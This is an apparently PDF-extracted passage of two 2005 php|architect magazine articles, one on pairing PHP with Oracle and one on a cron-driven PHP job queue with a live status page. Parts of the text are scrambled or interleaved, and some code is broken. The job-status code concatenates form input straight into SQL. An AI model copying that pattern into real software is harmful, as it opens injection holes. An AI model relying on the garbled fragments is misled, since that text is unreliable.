c = h > ( $ $ v r o l w e ) { i f ( $ v a l u ) < 1 0 0 ) { $ $ n k a e m y e ; s . = ” v ’ ” l . u e s h . e = s ( $ v a l u e ) . ” ’ ” ; c o m a = } e l s e { $ _ s Y t e a l t l u o s w ” = ; . = $ k y _ . ; ” w a s t o o } } s q l = “ I N S E d R s T [ ‘ d e s t i n e . “ ation_ FEATURE
PHP & Oracle
Recently, there has been a lot of attention paid to the partnership between Zend Corporation and Oracle. This article examines the benefits that this partnership offers web developers.
by ROBERT MARK
t does sound strange doesn’t it? The marriage of PHP and Oracle is a little like the odd couple. One side is bred of the free spirited open source community while the other springs from the requirements of a strict corporate culture. In fact, when you put the two together they complement each other very nicely, unlike the two fellows of 70’s TV fame. PHP enjoys the benefit of having a huge community of developers who create numerous quality open source components while Oracle is a proven enterprise database management system that offers a suite of applications that handle performance, scalability, and security. Over the past couple of years, the relationship between Oracle and PHP has grown closer, and more intimate. Both are the major players in their respective milieus and in spite of their differing backgrounds, the two have found a themselves sharing the spotlight recently as the partnership between Zend Technologies and Oracle has produced some tangible results. On October 11, 2005, Oracle and Zend announced that the new Zend core for Oracle was released for general distribution. In the past, in order to get PHP working with Oracle you had to download PHP, Apache, and Oracle Instant Client separately. You had to then create/ modify a make file, compile, link components and then configure each component, once installed. The Zend Core was built to deliver a tested, high performance OCI8 driver that integrates with Oracle 10g client libraries. It bundles together all of the install code for both PHP 5 and Oracle, which makes it a one stop shop for PHP and Oracle installations. The new Zend core is configurable from a single web-based interface and is available as a
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/263
free download from Zend.com. Originally, the PHP/Oracle APIs were quite limited. The original set of APIs for connecting PHP and Oracle were called ORA functions. These ORA functions are now deprecated and are no longer bundled with PHP. They were useful for simple insert and select statements but accessing stored procedures was problematic because this API lacked support for BLOBS, CLOBS and variable binding. The OCI8 functions, introduced in later versions of PHP 4, require Oracle 8 or greater to run on either Windows or Linux. These functions give more options for connecting to an Oracle database by allowing for the programmer to specify new or persistent connections for each database call from the web server. Large object support was introduced to make use of Oracles LOB data types, and variable binding was introduced to allow for execution of more complex stored procedures. Volume 4 Issue 11 • php|architect • 14
PHP & Oracle While the OCI8 functions offered greater flexibility when accessing Oracle, support was minimal at best as PHP developers generally focused on interfacing with MySQL databases, which were far more commonly connected with PHP. There existed few examples of major web sites that used PHP and Oracle for precisely this reason. Companies and organizations that use Oracle may not have wanted to explore newer avenues of web development when it was felt that PHP was an unproven method for accessing Oracle data. Since its inception in 1995, web development with Oracle has generally been associated with Java. Times have changed and it is now recognized that PHP and Oracle complement each other quite well. This article will explore some ways in which Oracle can benefit PHP development.
Use database caching or data caching Data caching is one of the best strategies for improving web application performance. It basically refers to a technique for improving performance by identifying frequently used information and storing it in an easily accessible place. Usually this means that the query or data set will be loaded into memory. The best way to handle data from a database is to design your application so that there are as few database calls as possible, in order to reduce the load on the server—which will slow your applications down. From the illustration in Figure 1, you can see how database caching works. If a dataset is specified as being cached, it is loaded into memory. If a query needs to access the dataset, it can pull it directly from memory. If the dataset has different requirements, such as customized parameters, the next step is to look into the indexing on a table. If the dataset still requires customization then the table must be accessed. Depending on your business rules, and if the data that you are requesting needs to be up to the minute and FIGURE 1
could change at any second then you will need to call the database for each and every page request. Often multiple calls will be necessary. There are many circumstances where a database call is unnecessary and the extra overhead can be avoided by simply caching a data set. Of course, the performance of a database management system depends a great deal on the experience and ability of the database designer, programmer and administrator. Oracle is very good at handling large numbers of requests, but there is no substitute for good database design. As an example, some of the applications that I have had a hand in writing were required to access database tables with hundreds of thousands of rows. Without proper indexing and data caching, the queries that would access data and then display it on a page would timeout before and query would finish processing. A single web page could have several such large database calls for a single page view. One page that I created with my development team for a web portal required that each person would view a customized page after they logged in. This meant that we would first have to conduct a search for a usernamepassword combination within a table that contained nearly half a million rows. This would return a login confirmation and a unique identifier. We would then query another table to find a list of that person’s interests; another query was for news stories related to a particular school and yet another query to display academic events based on the interest of that individual. All of the queries were contained in stored procedures that used complex SQL statements to present the user with a personalized home page based on a profile that was created from the available data. In order to reduce the amount of time it took to return data, several queries were cached, that is, they were stored in memory for ready access. As a result, displaying each customized home page now takes a fraction of a second. Data caching reduces the number and types of database queries that may be required to display a page. These features are not unreasonable in a world of Amazon.com type customization where each user is presented with a customized web interface but they place a huge burden on any database. Of course, all of this depends upon the business rules and the requirements of the project.
PDO vs. OCI and ADODB (PHP 5 Data Objects vs. Oracle Call Interface and ADOdb) The method for accessing data from Oracle through PHP has undergone several changes over the years. One thing that is notable about PHP is that because the development Volume 4 Issue 11 • php|architect • 15
PHP & Oracle of PHP tends to respond to the needs of the present, there seems to be less regard for future planning. This is one reason why there are so many separate database driver functions available in PHP. Each set of driver functions corresponds to a particular database platform although much of the functionality requirement remains the same from platform to platform. Why do we need a separate API for MySQL, Postgres and Oracle? That’s a good question. As PHP was being developed, the syntax and functionality for database access was created by separate groups of PHP developers, which resulted in different APIs for each database. This means that certain features that are available for developing in a MySQL environment will not be available to PHP developers using an Oracle database and vise-versa. This is why the PHP community is developing a new, reengineered API for all database calls. PHP Data Objects (PDO) is the new, more consistent database API that is currently still in development but is due to be included in the PHP 5.1 release. Some of the features, as they relate to FIGURE 2 Oracle, include a re-factored Oracle driver, statements with bound parameters, transactions, large objects and better error handling. Most importantly, PDO will provide a common interface for all database access. By abstracting the database layer you can use the same API for any database. The concept is similar to that of any database abstraction layer such as the ADOdb Database Abstraction Library (http://adodb.sourceforge.net). ADOdb provides a unified API for accessing SQL databases. It is fairly easy to learn, however it does not completely succeed in abstracting Oracle database access because some Oracle features are not available in other databases. Specifically, Oracle uses a datatype called ref cursor which is basically a pointer to a recordset. Because Oracle is the only database that uses this data type there is a function in ADOdb that is unique to Oracle called
ExecuteCursor. The ADOdb driver has also been proven to be faster in benchmarks performed by phpLense (http://phplense.com/lens/adodb/). A database abstraction layer makes moving from one database to another much easier, although this is not something to be taken lightly. Because much of the business logic is tied to the database you would be well advised to commit to one. As you can see in the example in Listing 1, the syntax is different for both the stored procedures in Oracle and in MySQL. Calls to stored procedures in Oracle are invoked with “BEGIN” while MySQL’s stored procedures are executed with “CALL”. This is one of the weaknesses of using a database abstraction layer. If the purpose of an abstraction layer is to facilitate code portability, then it would make sense to standardize the procedure calls. Using strictly entry level ANSI SQL in the PDO prepare statement would allow for this because all databases understand this standard,
Volume 4 Issue 11 • php|architect • 16
PHP & Oracle but calls to stored procedures are database specific. A database abstraction layer’s main strength is simplifying and reducing the amount of code it takes to complete the same task. If you can’t wait for PHP 5.1 to be released then ADOdb is your best bet. You should be LISTING 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
--set up database table for images CREATE TABLE DB_IMAGE_LIBRARY( IMG_ID NUMBER, CAT_ID VARCHAR2(2 BYTE), FILE_NAME VARCHAR2(50 BYTE), SIZE NUMBER, MIME_TYPE VARCHAR2(50 BYTE), IMG_BIN BLOB, WIDTH NUMBER, HEIGHT NUMBER, SHORT_DESC VARCHAR2(255 BYTE), DATE_ADDED DATE DEFAULT SYSDATE, DATE_MODIFIED DATE DEFAULT SYSDATE, C_OPERATOR_ID VARCHAR2(10 BYTE), STORAGE (initial 50K next 50K pctincrease 0) TABLESPACE DB_TABLE_DATA LOB (IMG_BIN) STORE AS (TABLESPACE IMAGE_DATA STORAGE(initial 100K next 100K pctincrease 0));
--Create a package to retrieve image data CREATE OR REPLACE PACKAGE PKG_IMAGE_MGMT AS TYPE my_ref_cursor IS REF CURSOR; PROCEDURE SP_GET_IMAGE (img_id IN NUMBER, my_cursor OUT my_ref_cursor); END; / CREATE OR REPLACE PACKAGE BODY PKG_IMAGE_MGMT AS TYPE my_ref_cursor IS REF CURSOR; CREATE OR REPLACE PROCEDURE SP_GET_IMAGE( img_id IN NUMBER, my_cursor OUT my_ref_cursor) AS BEGIN OPEN my_cursor FOR SELECT IMG_BIN, MIME_TYPE, FILE_NAME, WIDTH, HEIGHT, SHORT_DESC FROM web.DB_IMAGE_LIBRARY WHERE IMG_ID = img_id; END SP_GET_IMAGE; END; /
warned that if portability is your primary concern then you’ll have a tough time trying to standardize complex SQL queries. Because of the cases where ADOdb uses statements that apply only to Oracle and functionality that is unique to certain databases, portability is simply not possible—or at least not practical across database platforms.
Stored Procedures, Functions, Indexes and Views In order to take advantage of Oracle’s security features and speed, it is best to use stored procedures and functions because these modules are internal to the Oracle database. They can be written in either in Oracle’s proprietary PL/SQL language or in Java. PL/SQL is a procedural language that dates back to the days of COBOL. It is relatively easy to learn the syntax. As a native Oracle language, performance is improved because commands don’t have to be compiled before processing. As much business logic as possible should be left to the database in the form of stored procedures because the database is generally more suited to handle cross referencing large amounts of data than PHP (or any other web scripting language). Procedures are best used to promote reusability and to encapsulate complex business logic. In the university alumni portal example mentioned earlier, a single procedure could be used to provide all of the user information required to display the page. Also, the same database logic that applies to procedures may be required in several places, which encourage code reuse. For example, if your database contains a procedure that returns a schedule for next week for an employee, you can avoid constructing the query, adjusting the date, validating the individual and formatting the data by simply calling the procedure with certain parameters. When calling a stored procedure from PHP, the statement is first parsed, data is bound and then the statement is executed. The same parsed statement can be used over again with different variables bound to it. Oracle functions have the same basic qualities as Oracle stored procedures except that there are no OUT variables available in the function call. A function must return only one value. Another advantage of using stored procedures and functions is that variables are “bound” which means that because an input variable is not being used to form the SQL statement, the contents of a variable can be inserted directly into a table. This helps prevent SQL injections and frees the programmer from worrying about escaping quotes because this work is offloaded to the driver.
Volume 4 Issue 11 • php|architect • 17
PHP & Oracle
Oracle-Specific Features Virtual Private Database (VPD), also called fine-grained access control or row-level security, is a feature unique to Oracle that gives database administrators an extra set of tools that not only set user rights for a table but also define permissions for specific rows in a table. This feature was introduced in Oracle 8i and is available in all later versions. This feature, when used with Oracle’s “application context” will ensure that each user will be able to see a different data set while using the same SQL code. This provides a more manageable approach to security when developing for the web (see Figure 2). A major advantage of the VPD is that code does not have to be rewritten for each type of database user, as each is given a set of access rights, based in their context. The VPD essentially appends a WHERE clause to the end of each query. For example, a company may have regional offices, and each regional office will only be able to view data that relates to their specific region, even though they are querying the same data set. A database can then be constructed so that all offices will be able to access data in the same table, but queries to that table will only return data as it relates to the individual office. With fine-grained access control, an application can be written using standard SQL queries and output the data according to the privileges of the user requesting
as follows: 1. Define business rules. This implies creating a set of guidelines that determine which users are permitted to view the data and dictate how that data will be manipulated. 2. Set up roles, create users and grant roles to the users’ accounts. 3. Create the VPD policy function. This creates a function to be called whenever the table is accessed. The function returns a string that is essentially appended to the query’s WHERE clause. Oracle calls this function “the dynamic access predicate.” 4. Apply the policy to the table being accessed by registering the policy function or procedure using DBMS_RLS. 5. Apply the application context when the user logs in. This application context will then be passed to the policy when a table is accessed and the resulting recordset will be based on the permissions applied in the policy function.
Managing Multiple Database Names You should manage multiple database names in Oracle’s tnsnames.ora file, not in PHP. The OCI8 login function ocilogin() requires a username and password. The third parameter is the host database. A development environment in a larger enterprise my
One of the strengths of Oracle is its ability to handle large amounts of data. the data. Maintenance is also easier because it reduces the amount of code and simplifies the design. The “column masking” feature of the VPD also allows the database administrator to show or hide data fro, specific columns. In the previous example, a query like SELECT * FROM TBL_EMPLOYEES may return names, email addresses, fax numbers, etc., for all employees for queries performed by users in regional offices while the head office users may also see a column for salaries. Oracle 9i introduced a new tool called policy manager that provided a GUI for managing and setting up rowlevel security. The steps involved in setting up a VDP are
have a development web server, a testing web server and a production web server. Each server may connect to a different database. The test and development servers may connect to a test database while the live web server will always connect to a live database. Problems may arise when moving PHP code from one server to another because there may be a line of code placed on a web server that connects it to the wrong database. For example, when we test our code, we put an application in beta and we move it from the development web server to the test web server, where users may try
Volume 4 Issue 11 • php|architect • 18
PHP & Oracle to find bugs in the system. The test environment will use the same database as the development environment. Once testing has been completed, the code is transferred to the production server. We wanted to avoid having to make changes to the code before we moved it to production, so we decided to leave all of the settings that were unique to the server on the server. That is, the PHP code should always remain the same but the tmsnames.ora files can vary from server to server.
Handling Large Objects One of the strengths of Oracle is its ability to handle large amounts of data. There are 4 types of LOB data types. The Character Large Object (CLOB, NCLOB) can handle up to 4 GB of character data; Binary Large Objects (BLOB) store up to 4 GB of binary data; and BFILEs which are stored separately on the server’s filesystem, and are limited in size only by the operating system.
Enterprises that use PHP and Oracle can benefit from a large pool of PHP expertise. Put Oracle and PHP on Separate Servers If you spend the money for an Oracle license, then it would be a good idea to put the database on a separate piece of hardware. A dedicated database server essentially implies that the server is used solely by one database application. This gives the advantage of higher speed and better database performance because the processing power will not have to be shared by other server applications. PHP should be on a separate server from the database, primarily for maintainability. This will allow for easier maintenance because upgrades and patches will need to be applied to both PHP and Oracle as they become available. If the web server needs to be rebooted, there is no reason to also take down the database server. If you do decide to use a remote database, you must install the Oracle client on your PHP server and then configure it to access the database, which involves installing the Oracle instant client. As the database grows larger, Oracle database servers can be clustered to handle the requests. Clustering is accomplished by installing an add-on called Real Application Cluster (RAC), which was originally developed for Oracle 9i. With this feature, an Oracle database can run any application across a set of clustered servers. If one server fails, the application will continue running on the remaining servers until another server is added, and the functioning servers don’t need to be shut down.
These data types become useful when the database is used to store large binary or character objects. The CLOB field is especially useful because it can be searched. Larger enterprise databases can make heavy use of these features because the database can then act as a file server with built in security. Using the database to store binary data eliminates the need to duplicate security policies across server types. Let’s use an image server as an example. Normally, a website would keep images on the web server in a folder off of the root folder. Often, as the number of images increases so do the number of folders under the images. But what happens when you have several thousand images that must be stored, searched and categorized? An image library may contain several thousand images consisting of everything from buttons, banners and icons that people use for web pages to mug shots of employees to stock photos. Some of the photos may need to have security rights attached to them so that users do not infringe on any copyright laws by using images that are not supposed to be publicly available. One method of keeping track of the images that I have seen is to assign a unique identifier in a database table and associate it with a path to the location of the image on the file server or web server. In this situation there is an obvious problem with data integrity because there was no way to associate the location of the file with the database record. If a folder or a file were moved then the database record would become invalid. Volume 4 Issue 11 • php|architect • 19
//Presently, the steps required to make a database call are as follows: //OCILogon() – Login to the Database, OCIParse() – Parse the SQL string, //OCIExecute() – Execute the statement, OCIFetch() – Fetch Results //set up database connection $strUser = “scott”; $strPwd = “tiger”; $strDB=”(DESCRIPTION= (ADDRESS_LIST= (ADDRESS=(PROTOCOL=TCP) (HOST=my.hostname.domain.com)(PORT=1521) ) ) (CONNECT_DATA=(SERVICE_NAME=theservice)) )”; //login to database $objDBConn = OCILogon($strUser, $strPwd, $strDB); //test DB object if($objDBConn){ //construct query string $strSQL = “SELECT FIRST_NAME, LAST_NAME FROM PEOPLE.TBL_NAMES”; //parse query string $objQuery = OCIParse($objDBConn, $strSQL); //execute SQL statement $objResult = OCIExecute($objQuery); //test SQL statement result if($objResult){ //loop through query result set while(OCIFetch($objQuery)){ echo OCIResult($objQuery, “FIRST_NAME”); echo “ “; echo OCIResult($objQuery, “LAST_NAME”); echo “ ”; }//end while
Oracle stores a pointer in the table to the place in the data store where the actual data is located. The LOB data storage is defined by specifying a separate storage clause in the create table command. In Listing 2, the LOB clause tells Oracle where to store that data, while the parameters for the STORAGE clause control the physical areas that the data object will use on the disk. Storing images in a database table ensures that data integrity is maintained and all of the attributes of the image relate directly to the image. With Oracle Virtual Private Database the PHP programmer is freed from worrying about which images should be permitted in each context. If the VPD context is set to allow access by the general public then a simple select query will return all of the images that have this attribute attached.
Oracle in PHP: Strengths and Weaknesses One of the major strengths of using PHP for development is that support is offered through a large network of PHP developers who share problems and solutions in discussion forums, which are then made available to the general public. Support for PHP/Oracle combination is harder to find than support for MySQL. This is why the support that Oracle is offering to PHP developers through the Oracle Technology Network is essential to help the drive that Oracle is making towards supporting PHP. The Oracle Technology Network PHP Developer Center presents featured articles, forums and news related to
}else{ //error in query $arrError = OCIError($objQuery); }//end objResult if }else{ //error in connection $arrError = OCIError(); }//end objDBConn if if(isset($arrError)){ echo “ERROR: “.$arrError[‘message’]; } Connecting and executing the same SQL query with the new PDO API: //set up database connection $strUser = “scott”; $strPwd = “tiger”; $strDB = “OCI:dbname=theservice;host=my.hostname.domain.com”; try{ $objDB = new PDO($strDB, $strUser, $strPwd); } catch (PDOException $objException){ echo “ERROR: “ . $objException->getMessage(); } //construct query string $strSQL = “SELECT FIRST_NAME, LAST_NAME FROM PEOPLE.TBL_NAMES”; foreach($objDB->query($strSQL) as $arrRow){ echo $arrRow[‘FIRST_NAME’]; echo “ “; echo $arrRow[‘LAST_NAME’]; echo “ ”; }
Oracle/PHP programming. The main market for PHP and Oracle is in an enterprise where Oracle has been the database of choice and there is an existing repository of database code that will need to be leveraged for the web. If an organization that is presently using an Oracle database for their internal operations is planning to provide data access through the web, they will need a simple means to develop applications that can access and present Oracle data. PHP fits the bill nicely in this context because it can be understood by a beginner programmer while at the same time offering more complex object oriented features that one would expect to see in more complex languages such as Java. Enterprises that wish to embark on web application development using PHP and Oracle benefit from a large pool of PHP expertise. As PHP database access becomes more standardized through the introduction of a database abstraction layer of through the use of the new PDO functions. From the web developer side, less emphasis will need to be placed on specific database knowledge, which will result in more rapid application development. These features, combined with Oracle’s data security, blend nicely to form a very robust and practical web application development environment.
ROBERT MARK is a senior web and database programmer working at McGill University in Montreal, Quebec. He uses Oracle/PHP regularly.
Volume 4 Issue 11 • php|architect • 20
FEATURE
Job Management with PHP & Cron
Job Management with PHP & Cron Certain tasks take a long time to complete—longer than the client and the server timeouts will allow. In this piece, we discuss how to build an admin page to create and monitor a job queue, and dress it up with nearly real time status updates. by MIKE DeWOLFE
I
have been working on a system to import 10,000 user profiles and 20,000 forum discussion messages—all coming from different sources. Some of the imports may have missing information that the system has to bring in through an external election system. Some of the imports may not work at all. The biggest consideration: each import job may take tens of minutes and create a lot of server load. The duration of each job is such that if it is launched from a web client, the response will timeout before the job is complete. If a script times out before completion, some users may re-run the job and thereby cause problems. It is also difficult to assess which parts of the job have run and which parts remain to be processed. I could have built a one-off script for my import jobs but after the initial imports there will likely be more imports in the future. While I could be tasked to do the imports later, a clear tool that a non-programmer could use would be ideal. We need a way to see the job progress without interrupting the script to output HTML. Once the server has received a request or generated a response to the
PHP: 4+ O/S: Linux CODE DIRECTORY: phpcron TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/264 client, the clock is ticking for an impending script timeout. By keeping the job script operating solely on the server without direct client interaction, the script can run for as long as necessary. In essence, you need a worker script and a supervisory script. On top of that, some sophisticated interaction between the client and the server will both save on bandwidth and also make for a slick presentation. It’s not hard to pull off; it puts job tasks in the hands of nonprogrammers without giving them the keys to server; and it has an immediacy and polish that will create a good
Volume 4 Issue 11 • php|architect • 21
Job Management with PHP & Cron “wow” factor from users. To build this tool, you’ll need five components: one is the data—the database; two worker scripts, and two more scripts for show. The job script is launched by the cron job (and in turn by the cron daemon); the status editing page is built infrequently; the JavaScript does a lot of work, looking at the status of the jobs in progress. These rely on a source of continuity: a database to direct jobs, record job status changes. You may wish to add a log viewer (see “Job Log” and “Log Viewer” below).
The Data Structure There are two primary tables in use: jobs and job_status. If you wish to track individual tasks of a job, you’ll need a job_log table, as well. In this example, jobs is a table of its own, but in your application, it is possible that its role is much more subdued or rolled into another part of your application. jobs (Listing 1) holds the information about the jobs you wish to carry out. It’s packed with the data you need to run your automated jobs. It does not contain any information about status. It’s read-only as far as its interaction with the jobs as they are carried out. Your admin/display page can add records to jobs and alter them after the fact. job_status (Listing 2) is the orchestration of this system. It has a 1 to 1 relationship with jobs. It holds a list of statuses, information about completed jobs, and about jobs that are currently underway. The job script (see below) will write to this table, frequently. job_log (Listing 3) holds information about the individual elements of a given job. If this information isn’t desirable, leave out this table and its relevant code in the job_script.php script (in Listing 4).
a list of database tables and inserting the values from those tables into another database table. It is a simple illustration of the concepts that you need to consider, and fits nicely into our cron-based system. Really, any of your server’s cron jobs could report their status to a database and you can tap that database through the admin/display script to see when a cron job last ran and any notations as to that job’s status. You could build a particular script to handle each job and write a handler for each individual job, but that means you’re opening up the crontab (the file that controls when and how often a particular job runs) for editing by a PHP script. Cron jobs are very important to the security and well being of a web server and because of that, I preferred not to give PHP the opportunity to open the crontab and edit jobs. I prefer to have the server call a single script, frequently. If this script is run without any pending jobs, only a small load is put on the server. Keeping the PHP script’s hands off of the crontab leaves a security door shut.
The Cron Job Cron jobs are routine tasks that the server initiates at specific intervals. From a shell session, you can edit your cron job list by typing crontab –e. This puts the list of cron jobs into a text editor. The timing for every job is declared with five slots for time (minute, hour, day of the month, month and weekday) and the command or application to execute along with any supporting arguments. The time slots are either wildcard (*) to execute on every possible opportunity of a day, hour, etc., dash-joined or comma separated specific interval times. This means you can set cron jobs to execute every minute of every day or take some times and some days off.
The Job Script At the core of this system is the main worker—the job script (Listing 4). The “job” can be whatever you decide to plug into a system like this. It could be something too large to allow for a proper request-response from the server, whether it’s a matter of the number of items to process, their complexity, or a combination of both. The job could be something from an external source that does not directly interact with the admin system. Examples: posts coming into a discussion system from users; a long duration script that is going out to search for many news feeds; remote resources challenge/response, etc. In my case, I wrote a routine to process imported records bound for phpBB—large CSV files. The import job was very complex and specifically built for phpBB. In the example that I cite in this article, we are taking
LISTING 1 1 CREATE TABLE jobs 2 { 3 job_id INT NOT NULL PRIMARY KEY AUTO_INCREMENT, 4 processing_file VARCHAR(50), 5 destination_file VARCHAR(50) 6 }
if (!($result = mysql_query($sql))) { die(“job update failed”); } // this will only work on jobs that are not complete $sql = “UPDATE job_status SET `job_status` = ‘” .$input->job_status.”’ WHERE `job_status` < 2 AND job_id = “.$input->job_id; if (!($result = mysql_query($sql))) { die(“job update failed”); } } } // build page BuildHeader(); $query = “SELECT DISTINCT *, jobs.job_id as id FROM jobs job, job_status status WHERE job.job_id = status.job_id ORDER BY status.started DESC”; if ($recordset = mysql_query($query)) { echo “
”; echo “\t
Processing
”; echo “\t
Destination
”; echo “\t
Complete?
”; echo “\t
Status
”; echo “\t
”; echo “
”; } else { // doh! We have an error echo mysql_error(); } while ($row = mysql_fetch_array ($recordset)) { echo “
”; echo “\t
“.$row[‘processing_file’].”
”; echo “\t
”.$row[‘destination_file’].”
”; echo “\t
“.($row[‘job_status’] == 2) ? “yes” : “no”; // status form fields ?>
”; 180 // put in a form field to allow editing and then 181 // HIDE it. A JavaScript will make it visible 182 echo “
After the timing comes the command call. If you want to execute a PHP script, call its interpreter (php) and use the absolute location of your job script as its argument. In our case, we want to call a single job script repeatedly and let the script look to a database for relevant jobs to run. If there are no eligible jobs to be executed, the brief execution of the script will come to a close. Then, next time the cron tab matches the current time the script will be run again.
reduced convenience. If your job makes a sweep every minute, then when an administrator sets a job in motion, they need only wait a minute or so to see it executed. If you went to a cron job that executed every five minutes (or 288 times per day) you would have to wait until the next cron job triggers. Again, it not a big deal: it’s a question of immediacy through frequency vs. infrequency to make for a lower overall server load. When the jobs are underway an admin will want to monitor their status. There are two ways accomplish this: 1) reload the entire admin screen to get a refreshed view of the progress; or 2) make some surreptitious calls to the server for status updates. “Quiet calls” to the server will load the same dataset as a full page refresh, but they can serve out much less HTML to update the client. Rather than refresh the whole page, the refresh occurs in a nearly invisible IFRAME (1 pixel x 1 pixel)
For long-running tasks, the script will timeout before the job is complete. If you need to know more about how to build a cron tab, take a look at: http://www.mkssoftware.com/docs/ man1/crontab.1.asp. It explains the intricacies of crontabs: how to edit them, review them and set them up in the first place. Another resource at http://www.csgnetwork.com/crongen.html can help you build a sensible crontab via a JavaScript tool. Server load can affect your decision for when to run a cron job. If your server has a processing crunch at a peak time, it’s good idea to give a load intensive cron job a break at that time. You may ask yourself: are we really running a script every minute of every day? Well, yes. While that does mean 1440 calls per day, if there are no jobs waiting in the queue, it means the script runs, saying “nothing to do” and exits. 59 seconds later it does it again. You could run the script less often than every minute; or less often than every day (e.g. take Sundays off); or run it only during certain hours (e.g. run this on hours 0-18 (midnight to 6PM)). The upside of less frequency is less server load. The downside of less frequency is
that sits on the admin page. Instead of building HTML, the IFRAME contains JavaScript that calls functions in the parent page. When this frame page is loaded, the BODY onload() event calls a function that calls all of the update functions (see Listing 6). A meta-rage refresh will reload the page after so many seconds, to trigger the event, repeatedly, which will change the contents of the frame’s parent page.
How Much Work to Perform? How many jobs should you process for each execution? That’s a good question, and there are two schools of thought. If you have the job script load all of the jobs that it is eligible to process, there are two side effects. First, you will have a dataset of jobs to process before script execution completes. If the administrator changes his mind at some point after the script begins to run, and before a particular job runs, it’s too late to delay or rethink the execution without going in and killing the main process. Second, if you don’t want a process to run for a long time, you may wish to give the worker job fewer tasks, as Volume 4 Issue 11 • php|architect • 26
Job Management with PHP & Cron more tasks equates to longer runtime. My preference is to have each instance of the main script load and process a single job. This allows the worker script to tackle a smaller task, and complete more quickly. On the downside, it means that if there are many jobs in the queue you will have to wait many minutes before a newly-inserted task begins execution. In the end, it’s a matter of finesse. If jobs are likely to take more than a minute each, and you have your cron job set to execute the job script every minute, there is nothing to lose by executing only one job per iteration. If your jobs are expected to last less than one minute per execution, then you could either process all of the available jobs on each execution, or split the difference and limit the set of jobs to a smaller number (the number of jobs expected to take one minute). Calling long duration scripts via the Linux/Unix cron mechanism means they launch quietly and they close quietly. As each is processed, its current status will be exhibited by updating certain fields in the job database table. Scripts can also log their output by writing to an activity log database table.
Go, Caution, Stop In the example job script, we’ll use three general result codes for each leg of the job script: green indicates that everything went well, yellow means that the job passed, but there were problems, and red when an action has failed. You may choose to use only two statuses—success or failure—or you may have more finely defined levels. Our three statuses are named “Status_Green”, “Status_Yellow” and “Status_Red”. These names are used as both variable names and database field names. As each part of the job is processed, you could update the database, but I think that’s too intensive. Instead, what I my script keep track of the $Status_Green, $Status_Yellow and $Status_Red results. It increments the appropriate variable by naming $Current_Status “Status_Green”, “Status_Yellow” or “Status_Red”, and uses variable-variables to handle the switch. When you call $$Current_Status++ you increment either $Status_Green, $Status_Yellow or $Status_Red dependant on the value of $Current_Status. Then, every 50 iterations—when the modulus of processed items (the $pass variable) is equal to 0, it stops, does a database update to the “Status_” and “Total_Processed” fields for the currently-running job, using its job_id field as a key, resets the PHP variables, and continues processing. At the end of the processing, it does this update one more time, thus passing the remaining status updates into the database. This information isn’t used by the job script; it’s used by the
JavaScript generation page to update the admin control panel page.
Job Log For job, you may wish to see a quick notation about what happened during execution. This data is nice when your script succeeds, but it’s critical when something fails. Writing a note to a log will slow down processing, slightly, but if you consider that a fair tradeoff, then each part of a job should be annotated with a log entry. With the log available, the status/editing page can link to the current log for a particular job. In the example job script (Listing 4), you can see the job log insert statement.
The Display/Management Page The admin user will see the status page. For all intents and purposes, it’s the only visible part of this tool. It loads data from the import job page, along with the current set of statuses by joining two tables: jobs and job_status. Hidden on this page is an iframe: 1 pixel by 1 pixel in size. This connects another document to the admin page, but the secondary document is effectively invisible. The parent and iframe documents can communicate with each other through JavaScript. The iframe document can refresh, frequently, and the parent page appears static even though its data is changing in real time through function calls spawned from the nested frame. The status display page is very simple in its functionality; it lists all of the jobs available in the database, and the script contains a means to update existing or insert new jobs. As you see fit, you can elaborate on the functionality to suit your own purposes. If we have form input available, the form data will be passed to the UpdateData($input) function. If there is an $input[‘job_id’] available, it will perform an update. If there is no positive id number, it will insert a new job into the jobs table. In this example, a joined SELECT from the jobs and job_status tables yields all of the information we need to build the initial page with proper values and statuses. The code shown in Listing 5 takes a database row and passes that array to the BuildFormCells($object) function. This function uses the input to create HTML for output (and the edit form).
Objects in Use For each line item, there are two form objects. For each job, one form contains the status information. The second form is for inline editing of a job’s settings, which we’ll get to a little later. The status information form uses a form object as Volume 4 Issue 11 • php|architect • 27
Job Management with PHP & Cron a container, because that has the most widespread adoption. True, you could use DIV tagged elements and alter the innerHTML of objects, but as you degrade through browsers flavors and versions, this functionality will start to get spotty. Forms can be addressed by everything from Netscape 2.0 and IE 3.0+. Through CSS, you can dress up form elements like text fields to look like inline text— right down to allowing only the embedded JavaScript to alter the input fields. Best of all, you can implant text in text boxes, which makes them much more versatile than graphical status bars.
Getting Graphic In addition to altering form field contents, we’ll look at two ways to achieve a more graphic look for your status updates. You can either use a graphic (an image tag), and then change it as the status changes, or you can change the CSS dimensions of the form field to reflect the progress of your job script. The CSS method is nice because once you open up the crayon-box of directives, you can change background color, visibility, size and font facing from the source. Nevertheless, let’s discuss both options. To make an image into a representative status bar, you need to make its size relative to the page. In addition to positioning the image on the page you need to name it appropriately. In the example below, the graphical bars are named “status_[id#]_[color]img”. We immediately make the image invisible. While the form elements are inside of their form’s container object, the images are free-floating references within the document, itself, so you want the names to reflect specific pieces of data. Let’s create the images: <nobr>
The will snug the three next to each other allowing no part of the bar to wrap down to the next line. The images won’t actually show up, because the style has been set to not be visible. After the first invocation of “UpdateStatus()”, eligible bars will appear on the status page. You’ll also need to add the JavaScript code from Listing 5. Perhaps you want to trick out the functionality of the graphic display even further? Here’s an example of how to do it. What if you wanted to indicate that having more
than 20 red statuses is bad? One way to show off a dire situation is to change the image source for one of the status bars based on the status. Again, there’s JavaScript in Listing 5 to allow this (look for the part that changes the image’s src to skulls.jpg. When the status changes for the worse, the image source changes; when it improves, it can change back. While in this particular example, red > 20 is the qualifier, you may want the trigger to be red > green or red > (green + yellow) meaning that a majority of the job has gone bad. To change the CSS, it’s simple to pull off: Volume 4 Issue 11 • php|architect • 28
Another graphic option is to change the background image, based on the overall status of your jobs: if (red > 20) { document.getElementById(“status_” + id + “_redimg”).element(“green”).style. = “skulls.jpg”; } else { document.getElementById(“status_” + id + “_redimg”). src = “red.jpg”; }
One-stop Editing In the example script, we build the page, then hide the editable fields for each job. When you click on the “Edit” link, the CSS of a table cell is set from “display: none” to “display: inline”. This displays the cell, and allows editing. While more than doubles the size of the HTML served out to the admin, everything is available for editing and it all comes from the same dataset that is used to display static information. Also, by editing and/or hiding import job information, it allows the admin user to have second thoughts without departing from the general status page. In other words, he can get status updates while he’s preparing an import job. This sort of functionality is becoming more common everyday—for example, Blogger’s post editing table of contents contains a similar mechanism.
